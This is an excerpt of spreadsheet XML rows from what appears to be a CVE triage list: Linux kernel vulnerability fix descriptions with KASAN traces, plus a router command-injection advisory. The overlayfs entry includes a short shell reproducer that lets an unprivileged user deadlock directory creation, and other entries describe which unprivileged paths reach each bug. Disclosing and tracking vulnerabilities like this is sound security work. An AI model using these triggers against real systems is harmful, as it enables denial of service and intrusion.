[    2.275326] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
[    2.275329] RSP: 002b:00007fffffffec18 EFLAGS: 00000287 ORIG_RAX: 000000000000001b
[    2.275337] RAX: ffffffffffffffda RBX: 0000000000000066 RCX: 0000000000422ccd
[    2.275339] RDX: 00000000004d0940 RSI: 0000000001000000 RDI: 00007ffff4000000
[    2.275340] RBP: 00000000004d0940 R08: 0000000000000100 R09: 0000000000000100
[    2.275342] R10: 0000000000000100 R11: 0000000000000287 R12: 20c49ba5e353f7cf
[    2.275343] R13: 00000000004990d3 R14: 0000000000000000 R15: 0000000000000001
[    2.275346]  &lt;/TASK&gt;
[    2.275347]
[    2.296904] The buggy address belongs to the object at ffff888008d9b000
[    2.296904]  which belongs to the cache sigqueue of size 80
[    2.298151] The buggy address is located 0 bytes inside of
[    2.298151]  allocated 80-byte region [ffff888008d9b000, ffff888008d9b050)
[    2.299408]
[    2.299601] The buggy address belongs to the physical page:
[    2.300191] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x8d9b
---truncated---</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89754</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89755</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/migrate_device: clear stale mapping after freeing swapcache
__migrate_device_pages() reads the folio mapping before calling
folio_free_swap().  When folio_free_swap() succeeds, the folio is removed
from the swap cache, but the saved mapping still points to swap_space.
Passing the stale mapping to folio_migrate_mapping() makes it use the
mapped-folio path for a folio that is no longer in swapcache.  It can then
operate on swap_space.i_pages with invalid reference accounting,
eventually triggering a folio reference count BUG.
After a successful split, nr still contains the number of pages in the
original large folio, although each resulting page is now a separate
order-0 folio.  Reset nr to 1 so each split folio is processed separately,
including its own swapcache removal and mapping lookup.
Refresh the saved mapping after folio_free_swap() so the current folio
state is used during migration.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89755</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89758</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mempolicy: skip non-present PMDs when queueing folios
Patch series "mm: handle device-private PMDs in walk callbacks", v3.
Since commit 368076f52ebe ("mm/huge_memory: add device-private THP support
to PMD operations") a PMD may hold a device-private swap entry whenever an
HMM-based GPU driver migrates an anonymous THP folio to device memory via
migrate_vma_pages().
pmd_trans_huge_lock() succeeds for such PMDs (pmd_is_huge() returns true
for any non-present, non-none huge PMD), so several MM walk callbacks that
used to assume present THP or migration entry are now reachable with a
device-private PMD.  The results range from a VM_BUG_ON() firing on debug
kernels, to an oops on a bogus vmemmap dereference, to silently isolating
an unrelated live folio from LRU in the aliasing case.
This patch (of 3):
queue_folios_pmd() is called under pmd_trans_huge_lock(), whose
pmd_is_huge() check returns true for any non-present, non-none PMD
softleaf.  Passing such a PMD to pmd_folio() treats the softleaf encoding
as a hardware PFN and can return a bogus folio pointer.
Mirror queue_folios_pte_range(): handle non-present entries before looking
up a folio.  Keep migration entries counted as failures, but skip other
non-present PMDs such as device-private entries.
Potential trigger: an HMM-based GPU driver migrates an anonymous THP folio
to device memory via migrate_vma_pages(), leaving a device-private PMD. 
Userspace then calls mbind(), migrate_pages() or set_mempolicy_home_node()
on that range.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89758</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89760</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm, swap: don't free a hibernation slot that is in the swap cache
A slot with a folio in the swap cache is freed when the folio leaves the
cache, not when its count drops.  swap_put_entries_cluster() follows that
rule.  swap_free_hibernation_slot() does not, it calls
__swap_cluster_free_entries() whether or not a folio sits on the slot.
Cluster readahead can put one there.  It walks a raw page_cluster sized
window of offsets around the faulting entry, and a hibernation slot passes
__swap_cache_add_check() because it is not a folio and its count is not
zero.  Freeing the slot then clears the entry under that folio.
The folio is now unreachable from the swap table, and the offset goes back
to the allocator.  The folio is still on the LRU though, so reclaim can
pick it up later.  It then takes the old offset out of folio-&gt;swap and
overwrites the table entry there, which by then may belong to someone
else.
This bug can trigger silent memory corruption, process crashes, or data
instability across completely unrelated userspace applications - typically
occurring when uswsusp is preparing the hibernation image.
I found this while working on giving hibernation slots their own marker in
the swap table, which I had discussed with Kairui. 
(https://lore.kernel.org/linux-mm/abp7aDgYLrxF3Me8@KASONG-MC4/) As far as
I know there are no reports, so there is no Reported-by/Closes to add.
Check for a cached folio before freeing.  The slot is then left in the
ordinary state where only the swap cache holds it, and it is freed when
the folio leaves the cache, either through the reclaim below or through
normal reclaim later.</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89760</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89761</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix out-of-bounds write when null terminating a label vec
aa_vec_unique() null terminates at vec[n - dups] when VEC_FLAG_TERMINATE
is passed. If the components are all distinct no duplicates are dropped,
dups is 0 and the terminator goes to vec[n], so the caller has to provide
room for n + 1 entries.
aa_label_strn_parse() sets up its vector with vec_setup(profile, vec, len,
gfp) and then calls aa_vec_unique(vec, len, VEC_FLAG_TERMINATE), but
vec_setup() does not reserve the terminator entry. Up to LOCAL_VEC_ENTRIES
it uses the local array of LOCAL_VEC_ENTRIES pointers, above that it
allocates exactly len pointers. The terminator therefore lands one entry
past the end of the local array when len is LOCAL_VEC_ENTRIES, and one
entry past the end of the allocation when len is larger.
len comes from the number of "//&amp;" separated components in the label name
and label_count_strn_entries() does not bound it. An unprivileged task
reaches the parse by writing to /proc/self/attr/apparmor/current or through
lsm_set_self_attr(2), both of which go through do_setattr(), and the name
is parsed before the change_profile permission is checked.
The query_label() path behind the securityfs .access file, which is
mode 0666, performs no permission check at all. Every component has to
resolve to a loaded profile, so a system with policy loaded is required.
The other two VEC_FLAG_TERMINATE users work on a label vec that
aa_label_alloc() has already sized with "+ 1 for null terminator entry on
vec". Reserve the same entry in vec_setup() and DEFINE_VEC(). Passing
len + 1 from the caller instead would move len == LOCAL_VEC_ENTRIES out of
the local array and into kzalloc().</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89761</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89762</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix cred UAF caused by begin_current_label_crit_section()
AppArmor's begin_current_label_crit_section() is a scary function called
from lots of LSM hooks (in particular VFS/socket-related ones) that checks
if the label referenced by the current creds is marked FLAG_STALE, and if
so, attempts to use aa_replace_current_label() to replace the creds with an
updated version that uses a new label.
The first problem with this is that it would directly lead to UAF of
`struct cred` if anything in the kernel takes a pointer to the current
creds and accesses these past a security hook invocation that replaces
creds, like so:
```
const struct cred *cred = current_cred();
alloc_file_pseudo(...);
uid_t uid = cred-&gt;euid;
```
I don't know if anything in the kernel actually does this, but I think it
is very surprising that this pattern could lead to UAF.
The second problem is that things go wrong when aa_replace_current_label()
runs with overridden credentials. aa_replace_current_label() bails out if
`current_cred() != current_real_cred()` (mirroring the check in
proc_pid_attr_write()), but this check can't actually reliably detect
overridden credentials because the overridden creds can be the same as the
objective creds.
So in approximately the following scenario, things go wrong:
1. task begins with &lt;creds A&gt; (as both objective and subjective creds),
   with refcount=2
2. task grabs an extra reference on &lt;creds A&gt; for overriding
3. task calls override_creds(&lt;creds A&gt;), which returns a pointer to the old
   subjective creds (&lt;creds A&gt;)
4. task enters AppArmor LSM hook
5. AppArmor checks that objective/subjective creds are equal
6. AppArmor replaces both cred pointers with &lt;creds B&gt; and drops 2 refs on
   &lt;creds A&gt;
7. task leaves AppArmor LSM hook
8. task calls revert_creds(&lt;creds A&gt;)
9. now task-&gt;cred is &lt;creds A&gt; while task-&gt;real_cred is &lt;creds B&gt;, but the
   task_struct logically holds two references to &lt;creds B&gt;
10. another task drops the extra reference on &lt;creds A&gt; that was used for
    overriding, refcount drops to 0
11. now task-&gt;real_cred points to freed creds
At this point, any access to current_cred() will be UAF.
I have a test case where I run aa-disable on a profile while a process
using that profile is blocked on splice() from a FUSE passthrough file into
a full pipe; after the profile update, the pipe becomes empty, splice()
resumes, the credentials go out of sync, and a subsequent getuid() syscall
results in a KASAN UAF splat.
To fix this, instead of directly replacing creds, do it via task_work that
will run at the end of the current syscall. (The point in time at which the
cred replacement happens should have no correctness impact; it is just a
performance optimization to avoid unnecessarily touching the refcount of
the new label.)
Note that AppArmor still performs direct cred replacements in the
sb_pivotroot LSM hook after this change, and that direct cred replacements
can still happen in VFS -&gt;write() callbacks via proc_pid_attr_write().
There are two options for what to do with aa_dup_task_ctx(): Either
explicitly reset new-&gt;label_replacement_pending after the entire
aa_task_ctx has been copied, or switch to manually copying members over.
I am switching to manually copying members over because that should make
bugs more obvious.</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89762</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89763</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KEYS: trusted: Fix TPM teardown ordering
trusted_tpm_exit() drops the TPM chip reference and frees the digest
array before unregistering the trusted key type. key_type_lookup()
holds key_types_sem for reading until the key operation finishes, while
unregister_key_type() takes it for writing. It therefore provides the
synchronization point that must precede backend teardown.
The current order permits this interleaving:
  CPU 0                              CPU 1
  trusted_tpm_exit()                 key_type_lookup("trusted")
    put_device(&amp;chip-&gt;dev)             trusted_tpm_seal()
    kfree(digests)                       pcrlock()
    unregister_key_type()                  tpm_pcr_extend(..., digests)
CPU 1 can consequently dereference the freed digest array. The chip can
also be released before callbacks stop using it.
KASAN reported:
  BUG: KASAN: slab-use-after-free in tpm_pcr_extend+0x1f0/0x200
  Read of size 2 at addr ffff88810872d000 by task poc/89
  Call Trace:
    tpm_pcr_extend+0x1f0/0x200
    pcrlock+0x42/0x70 [trusted]
    trusted_tpm_seal+0x1b6/0x570 [trusted]
    trusted_instantiate+0x293/0x340 [trusted]
    __key_instantiate_and_link+0xb2/0x2b0
    __key_create_or_update+0x61e/0xb50
    __do_sys_add_key+0x1b8/0x310
  Allocated by task 88:
    __kmalloc_noprof+0x1a7/0x490
    do_one_initcall+0xa1/0x390
    do_init_module+0x2df/0x840
  Freed by task 90:
    kfree+0x131/0x3c0
    trusted_tpm_exit+0x59/0xa0 [trusted]
    __do_sys_delete_module+0x346/0x510
Move unregister_key_type() before releasing either resource. This stops
new lookups and waits for in-flight key operations to finish before the
backend state is destroyed.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89763</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89764</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rust: devres: fix race between concurrent revokers
There is a potential race condition when two paths try to revoke a
Devres concurrently.
The driver core's devres_release_all() calls Revocable::revoke() via the
release callback, while Devres::drop() calls revoke_nosync() on another
CPU.
The revoker that does not claim the is_available swap returns
immediately, but the revoker that did may still be executing
drop_in_place() on the inner data. This can cause a use-after-free when
the other revoker's caller proceeds to drop adjacent resources that
drop_in_place() still references (e.g., Devres&lt;DmaMappedSgt&gt; racing with
SGTable freeing the backing sg_table and pages).
Fix this by adding a Completion. The release callback signals the
Completion after revoke() finishes, and Devres::drop() waits for it when
it loses the is_available swap. This ensures the wrapped object is fully
torn down before Devres::drop() returns.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89764</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89767</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ovl: fix double end_creating() on the casefold-mismatch path
ovl_create_real() releases the new dentry twice when the casefold
consistency check fails.  The S_IFDIR branch calls end_creating() and
sets err, then falls through to the common out: label which calls
end_creating() on the same dentry again:
	case S_IFDIR:
		newdentry = ovl_do_mkdir(ofs, dir, newdentry, attr-&gt;mode);
		err = PTR_ERR_OR_ZERO(newdentry);
		if (!err &amp;&amp; ofs-&gt;casefold != ovl_dentry_casefolded(newdentry)) {
			pr_warn_ratelimited(...);
			end_creating(newdentry);	/* first */
			err = -EINVAL;
		}
		break;
	...
	if (err)
		goto out;
	...
 out:
	if (err) {
		end_creating(newdentry);	/* second, same dentry */
		return ERR_PTR(err);
	}
end_creating() is end_dirop(), which does inode_unlock() on the parent
and dput() on the dentry, so the parent directory's i_rwsem is unlocked
twice and the dentry is put twice.  The second unlock releases a lock
that is not held, which is what wedges every later creation under that
parent, and the second dput() drops a reference that was never taken.
The branch was added by commit dfc7da402ccc ("ovl: Check for casefold
consistency when creating new dentries") as a bare dput(), which already
released the reference twice; commit fe497f0759e0 ("VFS: change
vfs_mkdir() to unlock on failure.") converted both sites to
end_creating(), adding the double unlock.
This is reachable by an unprivileged user.  The casefold consistency of
the layers is validated at mount time in ovl_parse_layer(), and again on
every lookup in ovl_lookup_single(), but ofs-&gt;workdir is the internal
"work" subdirectory created inside the user-supplied workdir, and that
subdirectory is not re-checked.  Marking it casefolded after the mount
therefore makes every ovl_create_temp() inherit the wrong state - and
that path reaches ovl_create_real() through ovl_start_creating_temp(),
which uses start_creating() with a generated name and so never runs the
lookup-time check.
  unshare -Urm
  mount -t tmpfs -o casefold=utf8-12.1.0 tmpfs mnt
  mkdir -p mnt/lower/d mnt/upper mnt/work mnt/merged
  mount -t overlay ovl -o lowerdir=mnt/lower,\
        upperdir=mnt/upper,workdir=mnt/work mnt/merged
  chattr +F mnt/work/work
  mkdir mnt/merged/d/sub		# directory copy-up
  overlayfs: wrong inherited casefold (work/#5)
and the next copy-up blocks forever on the parent's i_rwsem:
  mkdir           D  start_creating+0x65/0xb0
                     ovl_start_creating_temp+0xb0/0xe0 [overlay]
                     ovl_create_temp+0xa3/0x1d0 [overlay]
                     ovl_copy_up_one+0x1f1c/0x21c0 [overlay]
                     ovl_copy_up_flags+0xf5/0x140 [overlay]
                     ovl_create_object+0xb7/0x220 [overlay]
                     ovl_mkdir+0x23/0x40 [overlay]
Drop the end_creating() from the branch and let out: own the cleanup,
which is what every other error path in this function already does.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89767</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89771</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Fix subbuf resize race with ring buffer readers
trace_buffer subbuf_size is read lockless in ring_buffer_read_page() and
ring_buffer_read_start(), while it can simultaneously be resized with
ring_buffer_subbuf_order_set().
Instead of trace_buffer::subbuf_size, use bpage::order in
ring_buffer_read_start() and ring_buffer_read_page().
In ring_buffer_read_start(), even with resize_disabled, there is still a
possibility of a race with a buffer modification. Hold the trace_buffer
mutex to synchronise with any pending ring buffer order modification.
trace_buffer::subbuf_size is now actually useless, remove it. Also,
create accessors rb_subbuf_capacity() and rb_page_capacity() which
return the actual size available for storing events, while
rb_subbuf_size() returns the actual subbuf page-size.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89771</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17176</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.036</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>An OS
command injection vulnerability in the TDDP module of Deco BE11000 allows an
adjacent network attacker to execute arbitrary commands with root privileges by
sending a crafted UDP packet.
Successful exploitation may lead to complete
device compromise, including unauthorized command execution, modification of
device settings, and loss of confidentiality, integrity, and availability</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17176</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
